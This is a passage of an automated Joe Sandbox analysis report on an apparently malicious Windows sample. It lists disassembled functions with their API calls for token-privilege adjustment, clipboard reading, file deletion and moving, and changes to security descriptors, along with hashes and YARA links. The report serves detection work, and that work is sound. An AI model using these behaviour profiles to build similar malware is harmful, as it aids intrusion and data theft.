                                                                                                                                                                              • Opcode Fuzzy Hash: 9ed413487e357585987da2afdb63d64177fdfee9bae8c8b31c11ecddba374191
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E315E71A40228BBEB216B71AC4AF7F7E7CEF55B50F104025FA05AA2D0C6B05951AEB0
                                                                                                                                                                              Function 004EB9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004EBF0F
                                                                                                                                                                                • Part of subcall function 004EBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004EBF3C
                                                                                                                                                                                • Part of subcall function 004EBEC3: GetLastError.KERNEL32 ref: 004EBF49
                                                                                                                                                                              • _memset.LIBCMT ref: 004EBA34
                                                                                                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004EBA86
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004EBA97
                                                                                                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004EBAAE
                                                                                                                                                                              • GetProcessWindowStation.USER32 ref: 004EBAC7
                                                                                                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 004EBAD1
                                                                                                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004EBAEB
                                                                                                                                                                                • Part of subcall function 004EB8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004EB9EC), ref: 004EB8C5
                                                                                                                                                                                • Part of subcall function 004EB8B0: CloseHandle.KERNEL32(?,?,004EB9EC), ref: 004EB8D7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                                              • String ID: $default$winsta0
                                                                                                                                                                              • API String ID: 2063423040-1027155976
                                                                                                                                                                              • Opcode ID: b8b9fca19b28ae3cd4c71e145e667b17e24a60395f6ed1f539ccaa5b35c7bede
                                                                                                                                                                              • Instruction ID: b1c88bd1c8a0bf1f2e91222c930b5faa19850e6bb42c80d0a775150da1186839
                                                                                                                                                                              • Opcode Fuzzy Hash: b8b9fca19b28ae3cd4c71e145e667b17e24a60395f6ed1f539ccaa5b35c7bede
                                                                                                                                                                              • Instruction Fuzzy Hash: FA818071800249AFDF11DFA6DD45AEF7BB8FF08305F14416AF914A6260DB398E14EBA4
                                                                                                                                                                              Function 004F6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BBC
                                                                                                                                                                                • Part of subcall function 004F7B9F: __wsplitpath.LIBCMT ref: 004F7BCF
                                                                                                                                                                                • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6B9D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6BBB
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6BE2
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004F6BF8
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F6C57
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6C6A
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6C7D
                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 004F6CAB
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6CBC
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6CDB
                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 004F6CEA
                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 004F6CFF
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6D10
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6D37
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6D53
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6D61
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 1867810238-1173974218
                                                                                                                                                                              • Opcode ID: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                                                                                                                                              • Instruction ID: 1b8e02fdcff1d17a2417751874dd4c9522fcef4e25e570b63460ab4c69dc3abb
                                                                                                                                                                              • Opcode Fuzzy Hash: 13d56b06fc3f4b08dfae43ec3c4269d9d9e3123cf4b8bbdbf955e296fab75521
                                                                                                                                                                              • Instruction Fuzzy Hash: CA515F7290015CAADB21DBA0DC54EEE77BCAF19304F0445DBE649E3201DB389B88CF65
                                                                                                                                                                              Function 00507099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • OpenClipboard.USER32(0054DBF0), ref: 005070C3
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 005070D1
                                                                                                                                                                              • GetClipboardData.USER32(0000000D), ref: 005070D9
                                                                                                                                                                              • CloseClipboard.USER32 ref: 005070E5
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00507101
                                                                                                                                                                              • CloseClipboard.USER32 ref: 0050710B
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00507120
                                                                                                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0050712D
                                                                                                                                                                              • GetClipboardData.USER32(00000001), ref: 00507135
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00507142
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00507176
                                                                                                                                                                              • CloseClipboard.USER32 ref: 00507283
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3222323430-0
                                                                                                                                                                              • Opcode ID: c5d9ca37ccd9f3c415d01b2cc322020715bb94f4fe8c941720ff756be144790b
                                                                                                                                                                              • Instruction ID: 90af03d67c4a09e25e702cc7c5e4e49da1960232d57ab960b3fc6c8ff207182b
                                                                                                                                                                              • Opcode Fuzzy Hash: c5d9ca37ccd9f3c415d01b2cc322020715bb94f4fe8c941720ff756be144790b
                                                                                                                                                                              • Instruction Fuzzy Hash: F251D6752082096BD300EF25DC86F6F7BB8BB98B00F00051EF556D62D1DB64E809DA72
                                                                                                                                                                              Function 004FFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004FFE03
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004FFE57
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE7C
                                                                                                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004FFE93
                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 004FFEBA
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF06
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF3F
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFF93
                                                                                                                                                                                • Part of subcall function 004D234B: __woutput_l.LIBCMT ref: 004D23A4
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FFFE1
                                                                                                                                                                              • __swprintf.LIBCMT ref: 00500030
                                                                                                                                                                              • __swprintf.LIBCMT ref: 0050007F
                                                                                                                                                                              • __swprintf.LIBCMT ref: 005000CE
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                              • API String ID: 108614129-2428617273
                                                                                                                                                                              • Opcode ID: 5954364c01addf287c62f272d46d67a8625af1c3487e287b72c9bacc86ae79cd
                                                                                                                                                                              • Instruction ID: 5ac51f21c32e05749123af6e24034ec66a991843ec85fb5871bfe5e022b72403
                                                                                                                                                                              • Opcode Fuzzy Hash: 5954364c01addf287c62f272d46d67a8625af1c3487e287b72c9bacc86ae79cd
                                                                                                                                                                              • Instruction Fuzzy Hash: 16A11071408344ABC350EFA5C895EAFB7EDBF98704F44091EF585C2191EB78DA09CB66
                                                                                                                                                                              Function 00502044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00502065
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050207A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502091
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 005020A3
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 005020BD
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 005020D5
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005020E0
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 005020FC
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502123
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 0050213A
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0050214C
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 0050216A
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00502174
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502181
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502191
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1803514871-438819550
                                                                                                                                                                              • Opcode ID: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                                                                                                                                              • Instruction ID: 171b1847203f02c25120fb248f1d9bd8340370f64b8495d522d9fb3bb71898c1
                                                                                                                                                                              • Opcode Fuzzy Hash: 6155f5801085814281c92988d69fade6612bdfa6c37892d2075e69138bfe7e39
                                                                                                                                                                              • Instruction Fuzzy Hash: 2731A2316002196BCB20ABB4EC5CADE7BBCAF15324F104166F911E31D0DB74DA88DA74
                                                                                                                                                                              Function 0050219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 005021C0
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 005021D5
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 005021EC
                                                                                                                                                                                • Part of subcall function 004F7606: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004F7621
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0050221B
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00502226
                                                                                                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00502242
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502269
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 00502280
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00502292
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(00563A68), ref: 005022B0
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 005022BA
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005022C7
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 005022D7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 1824444939-438819550
                                                                                                                                                                              • Opcode ID: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                                                                                                                                              • Instruction ID: 4ae0049de6c5c34e2ac06164a43849b07abb8408e5704e9d07212e22ef4c7a6c
                                                                                                                                                                              • Opcode Fuzzy Hash: b955e2c3d6d54723b234f32159998a2f825561339f4960868027c4a5b9077362
                                                                                                                                                                              • Instruction Fuzzy Hash: ED31B23560121A6ACB20EBE4EC4CEDE7BBCAF55324F1405A6E814A21D0DB749E89DA64
                                                                                                                                                                              Function 004B6BBC Relevance: 21.9, APIs: 5, Strings: 7, Instructions: 891COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove_memset
                                                                                                                                                                              • String ID: Q\E$[$\$\$\$]$^
                                                                                                                                                                              • API String ID: 3555123492-286096704
                                                                                                                                                                              • Opcode ID: d2f12b3f89852874279a8b16278bab8c44ebec4423dea4920fd4ec20105a1652
                                                                                                                                                                              • Instruction ID: ed005b545b4f1ffa594f51b47d98938b88e0a7fbb861afc7b562bf855febcdc1
                                                                                                                                                                              • Opcode Fuzzy Hash: d2f12b3f89852874279a8b16278bab8c44ebec4423dea4920fd4ec20105a1652
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F72B071D04219CBDF24CF98C8906EDBBB1FF44314F2581AAD855AB381D738AE81DB65
                                                                                                                                                                              Function 004DBDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                                                                                                                                              • Instruction ID: 708574b9cb43b7ea98e4247dfcf171224f1f35f5604fe1408835e78ef4203872
                                                                                                                                                                              • Opcode Fuzzy Hash: 6545c64291fadc06ce47dcff5d4aecddda6aed1b260198874712873e2902bf90
                                                                                                                                                                              • Instruction Fuzzy Hash: B8325B75A022298FDB248F19DDA06EAB7B5FB46310F0440DBE40AE7B81D7349E80DF56
                                                                                                                                                                              Function 004EB398 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                                • Part of subcall function 004EB8E7: HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                                • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                                                                                                                                                • Part of subcall function 004EB982: HeapAlloc.KERNEL32(00000000,?,004EB3E1,?), ref: 004EB995
                                                                                                                                                                                • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB3FC
                                                                                                                                                                              • _memset.LIBCMT ref: 004EB411
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB430
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB441
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004EB47E
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB49A
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB4B7
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB4C6
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004EB4CD
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB4EE
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 004EB4F5
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB526
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB54C
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB560
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3996160137-0
                                                                                                                                                                              • Opcode ID: 000e88e0e81c367e4166a7b2de5c82b09398c9dc7034802c898a570549f36206
                                                                                                                                                                              • Instruction ID: 8b549389e37f23c3cc4a22edb636603959bf5fa4ae6ee765b1f8b22b39ab6603
                                                                                                                                                                              • Opcode Fuzzy Hash: 000e88e0e81c367e4166a7b2de5c82b09398c9dc7034802c898a570549f36206
                                                                                                                                                                              • Instruction Fuzzy Hash: A8515A71900249ABCF04DFA2DC48AEFBB79FF04745F04811AF911A63A1DB389A05DFA4
                                                                                                                                                                              Function 004F6E4A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 004B31DA
                                                                                                                                                                                • Part of subcall function 004F7C0C: GetFileAttributesW.KERNEL32(?,004F6A7B), ref: 004F7C0D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6E7E
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 004F6E99
                                                                                                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 004F6EAE
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 004F6EDD
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6EEF
                                                                                                                                                                              • _wcscat.LIBCMT ref: 004F6F01
                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 004F6F0E
                                                                                                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 004F6F22
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004F6F3D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                              • API String ID: 2643075503-1173974218
                                                                                                                                                                              • Opcode ID: ee945507a9565c7d54c2551b144d28dfaacd6a4c9dbe8c897b64a7df8d78fae4
